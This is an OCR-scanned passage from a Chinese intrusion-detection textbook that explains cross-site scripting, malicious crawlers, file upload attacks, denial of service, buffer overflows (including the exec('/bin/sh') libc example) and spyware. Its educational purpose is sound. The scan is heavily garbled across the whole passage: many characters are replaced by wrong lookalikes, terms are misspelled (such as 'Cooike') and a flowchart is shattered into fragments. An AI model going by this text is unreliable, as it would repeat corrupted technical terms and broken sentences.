产生 的 Web 页 面 显示 薪 形 的 有 效 输入 时 , 鉴 站 脚本 攻击 就 有 可 能 发 生 ,这 允许 攻击 者 巩 
入 恶意 的 脚本 代码 到 产生 的 页 面 ,任何 用 户 访 问 该 站 点 时 都 会 在 用 户主 机 上 执行 该 脚本 。 

2) 跨 站 脚本 介绍 

当 一 个 Web 服务 奏 接 收 来 日 用 户 恶 意 构 造 的 数据 时 ,被 接收 的 恶意 效 据 通 第 以 超 链 
接 的 形式 散 入 Web 服务 器 ,该 超 链接 包含 了 恶意 的 内 容 , 用 户 很 可 能 不 注意 而 单 击 了 这 
些 链接 ,器 站 脚本 就 有 可 能 发 生 。 恶 意 链 接 的 来 源 有 可 能 来 日 男 一 个 网 站 的 链接 ,也 有 可 
能 来 日 怀 有 恶意 的 邮件 ,或 者 是 条 些 即时 通信 软件 上 的 消 明 链接 等 。 通 常情 况 下 ,攻击 者 
为 了 掩饰 不 民 的 用 心 ,会 把 链接 到 恶意 站 点 的 超 链 接 的 部 分 内 容 用 二 进 制 或 其 他 编码 方 
法 进行 编码 ,所 以 , 当 用 户 单 击 时 不 会 产生 怀疑 。 当 条 些 敏感 数据 被 网 页 服务 接收 后 , 它 
会 器用 户 产生 一 个 包含 恶意 数据 的 页 面 输出 ,而 这 些 数 据 正 是 攻击 者 之 前 藤 入 到 网 页 的 ， 
但 这 一 切 行为 表现 的 好 像 是 来 日 网 站 的 有 效 行为 一 样 。 

跨 站 脚本 是 指 在 远程 Web 页 面 的 HTML 代码 中 插入 的 具有 恶意 目的 的 数据 ,用 户 
认为 该 页 面 是 可 信赖 的 ,但 是 当 用 户 浏览 锅 下 载 该 页 面 , 能 入 其 中 的 脚本 就 会 被 解释 执 
行 。 所 以 ,器 站 脚本 产生 的 根本 原因 在 于 数据 和 代码 的 混合 使 用 。 

3) 器 站 脚本 攻击 过 程 

一 般 情况 下 ,攻击 者 设置 一 个 陷阱 ,要 么 通过 电子 邮件 ,要 么 通过 网 站 的 一 个 链接 ( 通 
过 插 人 亚 意 代码 到 看 似 无 害 的 指 回 一 个 合法 的 站 点 的 链接 上 ) ,一 旦 用 户 单 击 了 该 链接 ， 
攻击 者 的 请 求 将 锌 送 往 有 蜂 站 脚本 油 洞 的 网 站 服务 带 , 包 售 了 恶意 代码 的 链接 被 用 来 从 
取 登 录 信 息 ,Cooike 或 其 他 相关 的 数据 ,这 些 信 息 将 被 送 到 攻击 者 的 服务 天 。 蜗 站 脚本 
攻击 流程 图 如 图 1-4 所 示 。 

任何 支持 脚本 的 Web 浏览 亏 都 可 能 会 受到 攻击 。 而 且 ,恶意 脚本 搜集 的 数据 会 被 发 
送 回 攻击 者 的 网 站 。 例 如 ,如果 脚 本 使 用 动态 HTML 对 象 模型 从 页 面 提取 数据 ,一 个 器 

4) 跨 脚 本 攻击 的 危害 

览 站 脚本 攻击 与 SQL 注入 攻击 等 其 他 网 站 攻击 方式 的 不 同 点 在 于 ,人 它 所 攻击 的 最 主 
要 的 目标 不 是 Web 服务 带 本 号 ,而 是 登录 网 站 的 用 户 , 它 一 般 不 会 给 你 访问 Web 服务 天 
root 权限 或 系统 权限 ,但 是 ,攻击 者 如 果 成 功 地 利用 蜂 站 脚本 , 却 会 给 网 站 用 户 市 来 极 大 
的 危害 。 

(1) 会 话 支 持 和 Cookie 信息 盗 取 。 

跨 站 脚本 攻击 利用 用 户 和 网 站 之 间 的 信任 关系 ,通过 特殊 编写 的 URLs 对 用 户 进 行 
攻击 。 攻 击 者 的 意图 是 锚 取 用 户 ID 和 认证 的 Cooike, 或 者 欺骗 用 户 提 供 他 们 的 认证 给 
攻击 者 ,和 下 接 后 来 是 导致 攻击 者 可 以 镭 取 用 户 的 机 密 信 息 ,控制 或 盗 取 Cooike, 以 有 效用 
户 的 身份 请 求 服务 。 如 果 在 一 个 网 站 上 存在 一 个 XSS bug, 它 能 够 把 数据 从 Cooike 输出 
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| 向 用 户 发 送 带 有 站 | 

点 链接 的 Email 。 “| | 

用 户 单 击 攻击 者 担 | 
供 的 链接 

用 户 通过 单 击 到 达 “| 

Web 站 点 | 

QQ 


| 

| 

\ 赂 应 中 包括 出 现在 济 
, 。 响 和 中 的 亚 意 代码 
| 
| 
] 


脚本 在 受害 者 Web 站 | | 
点 的 上 下 文 执行 | | 
”| 
| | | 
图 1-4 跨 站 脚本 攻击 流程 图 
到 一 个 页 面 ,那么 XSS 攻击 可 以 通过 Cooike 一 直 保 存 下 去 。 要 实现 这 一 点 ,攻击 者 只 需 
将 恶意 脚本 注入 Cooike, 每 次 受害 者 访问 这 个 网 站 时 ,Cooike 中 的 脚本 被 重 放 ,执行 恶意 


代码 ,这 个 攻击 就 会 一 直 持 续 下 去 ,直到 用 户 删 掉 Cookie。 

(2) 突破 外 网 、 内 网 的 不 同安 全 设置 。 

XSS 攻击 可 被 用 来 对 付 防火 墙 后 的 机 器 。 许 多 公司 和 企业 的 局 域 网 都 被 配置 为 客 
户 端 计算 机 信任 局 域 网 中 的 服务 器 ,不 信任 外 部 Internet 上 的 服务 器 。 然 而 ,防火 墙 外 的 
服务 帮 可 以 欺骗 防火 墙 内 的 客户 端 ,让 它 认为 是 防火 墙 内 的 一 个 可 信任 的 服务 右 让 它 执 
行 一 个 程 友 。 

(3) 屏蔽 和 伪造 页 面 信息 。 

攻击 者 可 以 利用 iframe 标签 ,并 把 宽度 和 高 度 设置 为 100 弘 代替 用 户 的 主页 。 对 于 
用 户 来 说 ,看 到 的 地 址 栏 是 站 点 服务 硕 的 地 址 ,但 看 到 的 内 容 却 是 攻击 者 的 主页 

(4) 拒绝 服务 攻击 。 

攻击 者 可 以 利用 一 个 脚本 ,该 脚本 每 隔 一 段 时 间 运 行 一 次 ,如 20ms, 在 这 样 的 情况 

一 个 简单 的 消息 框 就 足以 造成 DoS 攻击 。 虽 然 这 样 的 攻击 不 是 致命 的 ,但 它 会 让 你 
ehgpierte tent ae 

(5) 辅助 攻击 。 

跨 站 脚本 攻击 还 可 以 pa 合 , 修 改 系统 设置 ,查看 系统 文件 ,下 载 特洛伊 
木马 并 运行 ,或 在 终端 用 户 的 系统 上 执行 恶意 代码 等 。 


3 谎 虫 攻击 
网 络 息 虫 又 称 网 络 蜂 蛛 或 网 络 机 各 人 ,是 一 种 按照 一 定 的 规则 日 动 抓 取 万 维 网 资源 
的 程序 或 者 脚本 ,已 被 广泛 应 用 于 互联 网 领域 。 搜 索引 擎 使 用 网 络 息 虫 抓 取 Web 网 页 、 
文档 ,甚至 图 片 .音频 .视频 等 资源 ,通过 相应 的 索引 技术 组 织 这 些 信 息 ,提供 给 搜索 用 户 
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进行 查询 。 随 着 网 络 的 迅速 发 展 ,万 维 网 成 为 大 量 信息 的 载体 ,如 何 有 效 地 提取 并 利用 这 
些 信息 成 为 一 个 巨大 的 挑战 。 不 断 优化 的 网 络 息 虫 技 术 正 在 有 效 地 应 对 这 种 挑战 ,为 高 
效 搜索 用 户 关 注 的 特定 领域 与 主题 提供 了 有 力 文 择 。 网 络 爬 虫 也 为 中 小 站 点 的 推广 提供 
了 了 有效 的 途径 ,网 站 针对 搜索 引擎 疏 虫 的 优化 曾 风 腰 一 时 。 

传统 网 络 爬 虫 从 一 个 或 奋 干 个 初始 网 页 的 统一 资源 定位 符 (CUniversal Resource 
Locator,URL) 开 始 , 获 得 初始 网 页 上 的 URL, 在 抓 取 网 页 的 过 程 中 ,不 断 从 当前 页 面 上 
抽取 新 的 URL 放 和 队列 , 百 到 满足 系统 的 一 定 条 件 停 止 抓 取 。 现 阶段 ,网 络 爬 虫 已 发 展 
为 涵盖 网 页 数据 抽取 、 机 需 学 习 、 数 据 挖 掘 .语义 理解 等 多 种 方法 综合 应 用 的 智能 工具 。 

由 于 网 络 候 虫 的 策略 是 尽 可 能 多 地 “ 息 过 ”网 站 中 的 高 价值 信息 ,会 根据 特定 策略 尽 
可 能 多 地 访问 页 面 ,占用 网 络 带 宽 并 增加 Web 服务 器 的 处 理 开 销 ,不 少 小 型 站 点 的 站 长 
发 现 当 网 络 候 虫 光顾 的 时 候 , 访 问 流 量 将 会 有 明显 的 增长 。 悉 意 用 户 可 以 利用 候 虫 程序 
对 Web 站 点 发 动 DoS 攻击 ,使 Web 服务 在 大 量 候 忠 程序 的 又 力 访问 下 资源 耗 尽 而 不 能 
提供 正 凋 服务。 恶意 用 户 还 可 能 通过 网 络 爬 虫 抓 取 各 种 敏感 黄 料 用 于 不 正当 用 途 ,主要 
表现 在 以 下 4 个 方面 。 

(1) 搜索 目录 列表 。 

互联 网 中 的 许多 Web 服务 天 在 客户 呈请 求 该 站 点 中 茶 个 没有 执 认 页 面 的 目录 时 ,会 
返回 一 个 目录 列表 。 该 日 录 列 表 通 党 包括 可 供用 户 单 击 的 目录 和 文件 链接 ,通过 这 些 链 
接 可 以 访问 下 一 层 目录 及 当前 目录 中 的 文件 。 因 而 ,通过 抓 取 目 录 列 表 , 恶 意 用 户 往往 可 
获取 大 量 有 用 的 货 料 ,包括 站 点 的 目录 结构 .敏感 文件 以 及 Web 服务 颖 设计 架构 及 配置 
信息 等 ,如 程序 使 用 的 配置 文件 日志 文件 .密码 文件 .数据库 文件 等 ,都 有 可 能 被 网 络 疏 
虫 抓 取 。 这 些 信息 可 以 作为 挑选 攻击 目标 或 者 卫 接 入 侵 站 点 的 重要 资料 。 

(2) 搜索 测试 页 面 、 手 册 文 档 ,样本 程序 及 可 能 存在 的 缺陷 程序 。 

大 多 数 Web 服务 带 软 件 都 附 市 有 测试 页 面 、 帮 助 文档 ,样本 程序 及 调试 用 后 门 程 序 
等 。 这 些 文件 往往 会 泄露 大 量 的 系统 信息 ,甚至 提供 绕 过 认证 直接 访问 Web 服务 数据 的 
方法 ,成 为 恶意 用 户 分 析 攻 击 Web 服务 絮 的 有 效 情 报 来 源 。 而 且 , 这 些 文件 的 存在 本 号 
也 上 暗示 网 站 中 存在 潜在 的 安全 汤 润 。 

(3) 搜索 管理 员 登 录 页 面 。 

许多 网 络 产品 提供 了 基于 Web 的 管理 接口 ,允许 管理 员 在 互联 网 中 对 其 进行 远程 管 
理 与 控制 。 如 宁 管 理 员 下 于 防范 ,没有 修改 网 络 产品 默认 的 管理 员 账 号 及 密码 ,一旦 其 管 
理 员 登 录 页 面 被 恶意 用 户 搜 索 到 ,网络 安全 将 面临 极 大 的 威胁 。 

(4) 搜索 互联 网 用 户 的 个 人 资料 。 

互联 网 用 户 的 个 人 资料 包括 姓名 、 号 份 证 号 .电话 、E-mail 地 址 .QQ 号 .通信 地 址 等 
个 人 信息 , 扯 意 用 户 获 取 后 容 多 利用 社会 工程 学 实施 攻击 或 诈骗 。 


4 文件 上 传 攻击 

文件 上 传 是 Web 应 用 很 常见 的 一 种 功能 ,本 号 是 一 项 正 第 的 业务 需求 ,不 存在 什么 
问题 。 但 如 果 在 上 传 时 没有 对 文件 进行 正确 处 理 , 则 很 可 能 会 发 生 安 全 问题 。 

文件 上 传 攻击 是 指 攻击 者 利用 Web 应 用 对 上 传 文件 过 滤 不 严 , 导 致 可 以 上 传 应 用 程 
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序 定 义 类 型 范围 外 的 文件 到 Web 服务 大。 例如 ,可 以 上 传 一 个 网 页 木马 ,如 宁 存 放 上 传 
文件 的 目录 刚好 有 执行 脚本 的 权限 ,那么 攻击 者 就 可 以 直接 得 到 一 个 Web Shell。 由 于 
服务 器 端 没 有 对 用 户 上 传 的 文件 进行 正确 处 理 ,导致 攻 击 者 可 以 回 某 个 可 通过 Web 访问 
的 目录 上 传 恶意 文件 ,并 且 该 文件 可 以 被 Web 服务 带 人 解析 执行 。 

攻击 者 要 想 成 功 实 施文 件 上 传 攻击 ,必须 满足 以 下 3 个 条 件 。 

(1) 可 以 上 传 任意 脚本 文件 ,日 上 传 的 文件 能 够 被 Web 服务 需 解 析 执 行 , 具 体 来 说 
就 是 存放 上 传 文件 的 目录 要 有 执行 脚本 的 权限 。 

(2) 用 户 能 够 通过 Web 访问 这 个 文件 。 如 果 文 件 上 传 后 不 能 通过 Web 访问 ,那么 

能 成 功 实 施 攻击 。 

(3) 要 知 追 文件 上 传 到 服务 带 后 的 存放 路 径 和 文件 名 称 , 因 为 许多 Web 应 用 部 会 修 
改 上 传 文件 的 文件 名 称 ,那么 这 时 就 需要 结合 其 他 漏洞 获取 到 这 些 信 息 。 如 果 不 知 道上 
传 文件 的 存放 路 径 和 文件 名 称 , 即 使 上 传 了 ,也 无 法 访问 。 


125 拒绝 服务 攻击 


拒绝 服务 (Denial of Service,DoS) 攻 击 是 指 占据 大 量 的 共享 资源 ,使 系统 没有 剩余 的 
资源 给 其 他 用 户 , 从 而 使 服务 请 求 被 拒绝 ,造成 系统 运行 迟缓 或 瘫痪 ，。 

要 完成 拒绝 服务 攻击 ,可 以 有 很 多 途径 ,如 对 Windows 系统 的 00B( 垃 圾 数据 ) 攻 击 
和 互联 网 组 管理 协议 (Internet Group Manage Protocol, IGMP) 攻 击 都 属于 拒绝 服务 攻 
击 ,它们 的 共同 特征 是 使 被 攻击 的 目标 无 法 正常 工作 。 拒 绝 服 务 攻击 降低 了 资源 的 可 用 
性 ,这 些 资 源 可 以 是 处 理 需 、 磁 盘 空间 .CPU 打印 机 .调制 解 调 需 ,甚至 是 系统 管理 员 的 
时 间 。 


1 攻击 目的 

使 用 拒绝 服务 攻击 通常 不 是 为 了 获得 访问 权 , 而 是 为 完成 其 他 攻击 做 准备 。 例 如 ,在 
目标 计算 机 上 放 木 马 ,需要 让 目标 计算 机 重新 局 动 ; 为 了 完成 IP 欺骗 攻击 ,需要 让 被 肯 充 
的 主机 瘫痪 ;在 正式 攻击 前 ,需要 使 目标 的 日 志 记 录 系 统 无 法 正常 工作 ， 


2 攻击 原理 

在 拒绝 服务 攻击 中 ,恶意 用 户 向 服务 器 传送 众多 要 求 确认 的 信息 ,使 服务 器 里 充斥 着 
这 种 无 用 的 信息 。 所 有 这 些 请 求 的 地 址 都 是 虚假 的 ,以 至 于 服务 器 试图 回 传 时 无 法 找到 
用 户 。 于 是 ,服务 器 暂时 等 候 , 有 时 超过 一 分 钟 ,然后 再 切断 连接 。 服 务 器 切断 连接 后 , 攻 
击 者 又 发 送 新 一 批 虚假 请 求 ,该 过 程 周 而 复 始 ,最 终 使 网 站 服务 器 充斥 大 量 要 求 回复 的 信 
息 ,消耗 网 络 带 宽 或 系统 资源 ,导致 网 络 或 系统 不 胜 负 荷 , 以 至 于 瘫痪 而 停止 提供 正常 的 
网 络 服务 。 

拒绝 服务 攻击 主要 采用 以 下 原理 。 

1) 市 宽 耗 尽 

节 宽 耗 尽 攻击 的 本 质 是 攻击 者 消耗 掉 某 个 网 络 的 所 有 可 用 带宽 。 这 可 以 发 生 在 局 域 
网 上 ,不 过 更 常见 的 是 攻击 者 远程 消耗 资源 。 这 种 攻击 有 两 种 基本 情形 : 情形 一 是 攻击 
者 因为 有 更 多 的 可 用 带宽 而 造成 受害 者 网 络 的 拥塞 ;情形 二 是 攻击 者 通过 征用 多 个 网 点 

1 


入 侵 检 测 与 入 侵 防 得 


集中 拥塞 党 害 者 网 络 连 接 放 大 他 们 的 DoS 攻击 效果 。 

2) 资源 衰竭 

并 源 颂 竟 攻击 与 市 物耗 尽 攻击 的 差异 在 于 ,前 者 集中 于 系统 资源 ,而 不 是 网 络 帝 源 的 
消耗 。 一 般 而 言 ,这 些 资源 涉及 诸如 CPU 利用 率 、 内 存 、 文 件 系统 限额 和 系统 进程 总 数 
之 类 系统 资源 的 消耗 。 攻 击 者 往往 拥有 一 定数 量 的 系统 资源 的 合法 访问 权 。 然 而 ,他 们 
会 滥用 这 种 访问 权 消 耗 额 外 的 资源 。 这 样 ,系统 或 合法 用 户 就 被 剥夺 了 原来 享有 的 资源 
份额 。 资 源 惨 竭 Dos 攻击 通常 会 因为 系统 月 沉 文件 系统 变 满 或 进程 被 挂 起 等 原因 而 导 
致 资源 不 可 用 。 

3) 利用 缺陷 编程 

编程 缺陷 是 应 用 程序 .操作 系统 或 仍 人 式 逻 和 辑 世 片 在 处 理 异 背 条 件 上 的 失败 。 攻 击 


者 不 遗 余 力 地 发 掘 程序 .操作 系 统 或 CPU 的 缺陷 和 漏洞 ,以 导致 关键 应 用 程序 和 敏感 系 
统 朋 湿 。 


4) 路 由 与 域名 系统 CDNS) 攻 击 

基于 路 由 的 DoS 攻击 涉及 攻击 者 操纵 路 由 表 项 ,以 拒绝 对 合法 系统 或 网 络 提供 服 
务 。 诸 如 路 由 信息 协议 vl1 和 边界 网 关 协议 v4 之 类 较 早 版 本 的 路 由 协议 没有 或 只 有 很 弱 
的 认证 机 制 ,这 给 攻击 者 变换 合法 路 径 提供 了 良好 的 前 提 , 往 往 通 过 假冒 源 IP 地 址 就 能 
创建 DoS 条 件 。 

域名 系统 攻击 同样 会 给 受害 者 市 来 许多 麻烦 ,大 多 数 DNS 攻击 都 涉及 劝 服 受害 者 域 
名 服务 虎将 虚假 的 地 址 信息 存 到 高 速 缓存 。 这 样 , 当 合法 用 户 请 求 某 台 DNS 服务 需 执 行 
查找 请 求 时 ,攻击 者 就 达到 了 把 它们 重 定向 到 自己 希望 的 网 点 上 的 效果 , 某 些 情况 下 还 被 
重 定 问 到 不 存在 的 网 络 中 。 


3 攻击 方式 

针对 网 络 的 拒绝 服务 有 3 种 常见 的 攻击 方式 : 服务 过 载 .消息 流 和 信号 接地 。 

1) 服务 过 载 

当 大 量 的 服务 请 求 发 癌 一 台 计 算 机 中 的 服务 守护 进程 时 ,就 会 发 生 服 务 过 载 。 在 
分 时 机 制 中 ,这 些 潮水 般 的 请 求 使 得 计算 机 忙于 处 理 这 些 不 断 到 来 的 服务 请 求 ,以 至 
于 无 法 处 理 常 规 任务 。 由 于 没有 空间 存放 这 些 请 求 , 许 多 新 到 来 的 请 求 被 丢弃 。 如 果 
攻击 的 是 一 个 基于 TCP 的 服务 ,那么 这 些 请 求 包 还 会 被 重 发 ,结果 更 加 重 了 网 络 的 负 
担 。 这 种 攻击 可 能 是 攻击 者 为 掩盖 日 己 的 六 迹 ,阻止 对 攻击 者 的 记录 和 登录 请 求 的 系 
统 记 账 审计 。 

2) 消息 流 

消息 流 发 生 于 用 户 向 网 络 上 的 一 台 目 标 主机 发 送 大 量 的 数据 包 , 延缓 目标 主机 的 处 
理 速 度 , 阻 止 处 理 正常 任务 。 这 些 请 求 可 能 是 请 求 文 件 服务 、 要 求 登录 或 者 仪 是 简单 的 啊 
应 包 , 如 Ping。 无 论 是 什么 形式 ,大 量 的 服务 请 求 加 重 了 目标 主机 的 处 理 带 负载 ,使 目标 
主机 必须 消耗 资源 啊 应 这 些 请 求 。 极 端的 情况 ,这 种 攻击 可 以 引起 目标 主机 因为 没有 内 
存 做 缓冲 ,以 存放 到 来 的 请 求 ,或 者 因为 其 他 错误 而 死机 。 这 种 拒绝 服务 攻击 主要 针对 的 
是 网 络 服务 姨 。 
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3) 信号 接地 

使 用 物理 方法 也 可 以 关闭 一 个 网 络 。 将 网 络 的 电缆 接地 ,引入 一 些 其 他 信和 号 或 者 将 
以 太 网 上 的 问 接 虎 拿 走 , 都 可 以 有 效 阻 止 依赖 服务 硕 提 供 程 序 和 资源 的 各 种 机 天 , 也 可 以 
阻止 回 主 服务 需 汇 报错 误 的 登录 请 求 或 者 危险 的 行动 ,掩盖 一 次 非法 访问 的 企图 。 


126 缓冲 区 溢出 攻击 


缓冲 区 渔 出 是 一 个 普通 而 大 辽 的 独 洞 ,在 各 种 操作 系统 .应 用 软件 中 广 沁 存 在 。 旧 
1997 年 以 来 ,组 ee 根据 国内 外 多 家 权 
威 网 络 安全 机 构 实 时 更 新 的 汤 洞 列表 分 析 数 据 显示 ,缓冲 区 溢出 问题 正在 扩大 ,缓冲 区 浴 
出 已 成 为 现代 计算 机 系统 长 期 存在 的 安全 问题 ,是 目前 远程 网 络 攻击 的 主要 手段 。 

缓冲 区 攻击 的 本 质 是 设法 使 目标 机 各 执行 攻击 者 给 其 安排 的 代码 ,从 而 达到 攻击 目 
的 的 过 程 。 可 能 存在 缓冲 区 洲 出 潮 洞 的 程序 其 明显 特征 是 程序 运行 时 需要 从 外 部 获取 长 
度 不 确定 的 数据 ,将 数据 传递 给 内 部 绥 冲 区 时 又 不 进行 有 效 的 数组 边界 检 杜 。 

通过 回程 序 的 缓冲 区 写 人 超出 其 长 度 的 内 容 , 使 得 与 缓冲 区 相 邻 的 数据 锌 修改 ,如 村 
修改 了 茶 些 决定 程序 执行 流程 的 指针 , 则 程序 的 执行 流程 将 变 得 不 正常 。 精 心 设计 的 绥 
冲 区 溢出 会 按照 攻击 者 的 意图 改变 程序 执行 流程 ,达到 攻击 者 的 目的 。 在 实现 上 通常 是 
扰乱 条 些 特权 程序 的 正常 执行 ,使 攻击 者 取得 该 程序 的 控制 权 。 如 末 程 序 具有 足够 的 权 
限 ,整个 主机 都 可 以 被 控制 。 

缓冲 区 洗 出 攻击 的 关键 是 力求 通过 控制 返回 地 址 , 转 到 想 要 执行 的 程序 人 口 ,进而 可 
以 控制 整个 系统 。 为 此 ,攻击 者 必须 完成 两 方面 的 工作 : 在 程序 的 地 址 空间 里 安排 适当 
的 代码 ;通过 适当 初始 化 寄存 此 和 存储 融 , 让 程序 跳 转 到 安排 好 的 地 址 空间 执行 。 


1 在 程序 的 地 址 空间 里 安排 适当 的 代码 

1) 植 入 法 

攻击 者 回 被 攻击 的 程序 输入 一 个 字符 串 ,程序 会 把 这 个 字符 串 放 到 缓冲 区 里 。 
字符 串 包含 的 数据 是 可 以 在 这 个 被 攻击 的 便 件 平台 运行 的 指令 列 。 pai 
击 程序 的 缓冲 区 存放 攻击 代码 。 

攻击 者 不 必 为 达到 此 目的 而 溢出 任何 缓冲 区 ,可 以 找到 足够 的 空间 放置 攻击 代码 。 
缓冲 区 可 以 设 在 任何 地 方 ,如 设 在 堆栈 (自动 变量 ) 、 堆 (动态 分 配 的 ) 和 静态 数据 区 (初始 
化 或 者 未 初始 化 的 数据 )。 

2) 利用 已 经 存在 的 代码 

在 一 些 情况 下 ,攻击 代码 已 经 存在 于 被 攻击 程序 的 内 存 空间 中 ,攻击 者 要 做 的 只 是 对 
代码 传递 一 些 参 数 , 然 后 使 程序 跳 转 到 预期 目标 。 例 如 ,攻击 代码 要 求 执 行 exec("/bin/ 
sh") ,而 在 libc 库 中 的 代码 执行 exec(arg) ,其 中 arg 是 一 个 指 问 字 符 串 的 指针 参数 ,那么 
攻击 者 只 要 把 传人 的 参数 指针 改 向 /bin/sh, 然 后 调转 到 库 中 的 相应 指令 序列 即 可 。 

2 通过 适当 初始 化 寄存 希 和 存储 瑚 ,让 程序 跳 转 到 安排 好 的 地 址 空间 执行 

攻击 者 采用 的 大 量 方法 都 是 寻求 改变 程序 的 执行 流程 ,使 之 跳 转 到 攻击 代码 。 最 基 
本 的 是 一 个 没有 边界 检查 或 者 有 其 他 弱点 的 缓冲 区 溢出 ,这 样 就 扰乱 了 程序 的 正 篆 执 行 
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顺序 。 通 过 缓冲 区 溢出 ,攻击 者 可 以 使 用 骏 力 的 方法 改 瑟 相 邻 的 程序 空间 ,和 直接 跳 过 系统 
的 检查 。 

绥 冲 区 溢出 的 分 类 基准 是 攻击 者 所 寻求 的 缓冲 区 潜 出 的 程序 空间 类 型 ,原则 上 可 以 
是 任 童 空间。 例如 ,起 初 的 更 尔 斯 蠕虫 就 是 使 用 了 程序 的 缓冲 区 洲 出 ,扰乱 要 执行 的 文件 
的 名 字 。 实 际 上 ,许多 缓冲 区 洲 出 是 用 又 力 的 方法 寻求 改变 程序 指针 的 。 这 类 程序 的 不 
同 之 处 是 程序 空间 的 突破 和 内 存 空间 的 定位 不 同 ,主要 有 以 下 3 种 。 

1) 激活 记录 

每 当 图 数 调用 发 生 时 ,调用 者 都 会 在 堆栈 中 留 下 活动 记录 , 它 包 含 图 数 结束 时 返回 的 
地 址 。 攻 击 者 通过 溢出 堆栈 中 的 日 劫 变量, 使 返回 地 址 指 癌 攻击 代码 。 当 函数 调用 结束 
时 ,通过 改变 程序 的 返回 地 址 ,程序 就 可 以 跳 转 到 攻击 者 设 定 的 地 址 ,而 不 是 原先 的 地 址 。 
这 类 绥 冲 区 洲 出 被 称 为 堆栈 溢出 攻击 ,是 目前 最 瘦 用 的 缓冲 区 洲 出 攻击 方式 。 

2) 函数 指针 

图 数 指针 定位 任何 地 址 空间 ,攻击 者 只 需 在 任何 空间 内 的 图 数 指针 附近 找到 一 个 能 
够 溢出 的 缓冲 区 ,然后 溢出 这 个 缓冲 区 改变 卫 数 指针 。 在 某 一 时 刻 , 当 程序 通过 卫 数 指针 
调用 妇 数 时 ,程序 的 流程 就 按 攻击 者 的 意图 实现 了 。 其 攻击 汇 例 是 在 Linux 系统 下 的 
superprobe 程序 。 

3) 长 跳 园 组 冲 区 

在 CC 语言 中 包 作 了 一 个 和 商 单 的 检验 /恢复 系统 , 称 为 setimp/longjmp ,意思 是 在 检验 
点 设 定 setjmp(buffer) ,用 longjmp(Cbuffer) 恢 复 检验 点 。 然 而 ,如 果 攻 击 者 能 够 进入 缓冲 
区 的 空间 ,那么 就 可 以 利用 longjmp(Cbuffer) 跳 转 到 攻击 者 的 代码 段 。 像 图 数 指针 一 样 ， 
longjmp 级 冲 区 能 够 指 问 任何 地 方 ,所 以 攻击 者 要 做 的 就 是 找到 一 个 可 供 洲 出 的 缓冲 区 。 
一 个 典型 的 例子 是 Perl5。 攻 击 者 站 先进 入 用 来 恢复 缓冲 区 溢出 的 longjmp 绥 冲 区 ,然后 
诱导 、 进 入 恢复 模式 ,这 样 就 使 Perl 的 解释 器 跳 转 到 攻击 代码 上 了 。 


3 代码 植 入 和 流程 控制 技术 的 绽 合 分 析 

最 简单 和 第 见 的 缓冲 区 溢出 攻击 类 型 是 在 一 个 字符 串 里 综合 了 代码 植 人 和 激活 记录 。 
攻击 者 定位 一 个 可 供 溢 出 的 目 动 变量 ,人 然后 疝 程序 传递 一 个 很 长 的 字符 串 , 引 发 缓冲 区 溢 
出 ,在 改变 活动 记录 的 同时 植 人 代码 。 因 为 C 语 言 习惯 上 只 为 用 户 和 参数 开辟 很 小 的 缓冲 
区 ,因此 这 种 漏洞 攻击 的 实例 十 分 常见 。 代 码 植 和 信和 缓冲 区 溢出 不 一 定 要 在 一 次 动作 内 完 
成 。 攻 击 者 可 以 在 一 个 缓冲 区 内 放置 代码 ,这 是 不 能 洪 出 的 缓冲 区 。 然 后 ,攻击 者 通过 溢出 
为 外 一 个 缓冲 区 转移 程序 的 指针 。 这 种 方法 一 般 用 来 解决 可 供 溢 出 的 缓冲 区 不 够 大 (不 能 
放下 全 部 的 代码 ) 的 情况 。 如 果 攻 击 者 试图 使 用 已 经 常 驻 的 代码 ,而 不 是 从 外 部 植 人 代码 ， 
他 们 通常 必须 把 代码 作为 参数 调用 。 例 如 ,在 libc( 几 乎 所 有 的 程序 都 用 它 连 接 ) 中 的 部 分 
代码 段 会 执行 exec (something) ,其 中 something 就 是 参数 。 攻 击 者 使 用 缓冲 区 溢出 改变 程 
序 的 参数 ,然后 利用 另 一 个 缓冲 区 溢出 使 程序 指向 libc 中 特定 的 代码 段 。 


127 软件 攻击 


1 间 旋 软件 攻击 
间谍 软 件 一 词 最 早出 现在 1995 年 10 月 16 日 ,最初 是 用 来 统称 间谍 随身 携带 的 诸如 
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微型 照相 机 之 类 的 专用 设备 。1999 年 ,ZoneLabs 在 发 布 其 个 人 防火 墙 产品 ZoneAlarm 
时 赋 子 间 诬 软件 网 络 时 代 的 新 含义 。 但 间 诬 软件 到 目前 还 没有 一 个 精确 的 定义 。 一 般 而 
言 , 间 诬 软 件 是 指 未 经 用 户 允 许 偷偷 安 准 在 用 户 计算 机 中 ,监控 其 网 上 活动 或 短 探 用 户 资 
料 ,在 用 户 不 知情 的 情形 下 ,将 收集 到 的 一 些 机 密 信 息 发 给 第 三 方 的 一 种 软件 。 

间谍 软件 发 展 之 初 ,多 被 一 些 在 线 广 告 商 以 及 Kazaa 等 音乐 交换 网 站 使 用 ,这 些 公司 
将 一 些 监控 程序 放 在 用 户 计 算 机 内 监视 其 网 上 行为 ,收集 其 兴趣 爱好 ,或 者 在 空闲 时 间 进 
行 其 他 操作 。 这 些 公 司 以 让 用 户 上 网 免费 赚钱 或 免费 获得 音乐 为 迪 子 ,吸引 了 众多 用 户 
下 载 ,而 这 些 软 件 中 所 市 的 间谍 程序 便 悄悄 地 收集 用 户 信息 , 然 后 根据 这 些 信息 发 送 三 
告 , 或 者 把 这 些 收集 的 信息 转 买 给 其 他 广告 公司 以 获取 利益 。 现 在 , 间 诬 软件 已 被 更 多 的 
公司 及 个 人 利用 ,其 目的 也 从 初期 的 “单纯 化 ”向 “ 复 淋 化 ”发 展 ,如 下 接 盗 取 用 户 账号 、 密 
但 等 。 

1) 间 诬 软件 的 分 类 

间谍 软件 从 出 现 到 现在 ,已 取得 了 迅速 的 发 展 。 到 目前 为 止 , 仅 在 SpyBot-Search & 
Destroy 数据 库 中 描述 的 就 有 700 多 种 。 对 SpyBot-Search 上 Destroy 数据 库 中 的 间谍 
软件 进行 分 析 , 可 归纳 为 以 下 7 种 类 型 。 

(1) Cookies 和 Webbugs 类 ; Cookie 其 实 是 一 个 文本 文件 , 它 存 放 在 用 户 的 合租 上， 
存储 了 Web 站 点 能 使 用 的 参数 和 其 他 用 户 信 息 。 当 一 个 用 户 浏览 Web 站 点 时 , Web 服 
务 各 检 查 Cookie 是 否 在 本 地 计算 机 上 存在 ,如 朱 不 存在 , 则 服务 融 发 送 网 页 的 同时 发 一 
个 Cookie 给 用 户 。Webbugs 是 一 种 能 入 在 Web 页 上 的 不 可 见 图 像 ,因为 广告 客户 经 常 
